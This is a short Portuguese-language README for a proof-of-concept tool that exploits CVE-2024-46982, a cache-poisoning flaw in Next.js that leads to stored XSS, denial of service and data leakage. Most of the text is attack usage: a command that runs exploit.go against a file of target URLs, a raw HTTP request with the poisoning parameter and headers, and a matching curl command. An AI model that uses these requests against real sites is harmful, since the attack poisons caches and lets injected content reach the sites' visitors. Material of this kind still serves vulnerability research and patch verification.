
Prova de Conceito CVE-2024-46982
Esta ferramenta automatiza a detecção e a exploração da CVE-2024-46982, uma vulnerabilidade de envenenamento de cache no Next.js, em que respostas de Renderização no Lado do Servidor (SSR) podem ser incorretamente armazenadas em cache como Geração de Site Estático (SSG). Essa configuração incorreta pode levar a XSS Armazenado, DoS e vazamento de dados, permitindo que atacantes injetem conteúdo malicioso em respostas em cache.
Crie um arquivo chamado targets.txt contendo uma URL de destino por linha:
https://vulnerable-site.com
https://another-target.com
Crie um arquivo chamado payloads.txt contendo payloads que serão injetados por meio do cabeçalho User-Agent:
Compile e execute o exploit com:
go run exploit.go -f targets.txt -p payloads.txt -d 5
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
Envie uma solicitação maliciosa usando curl:
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
-H "User-Agent: " \
-H "x-now-route-matches: 1"
Visite o endpoint em um navegador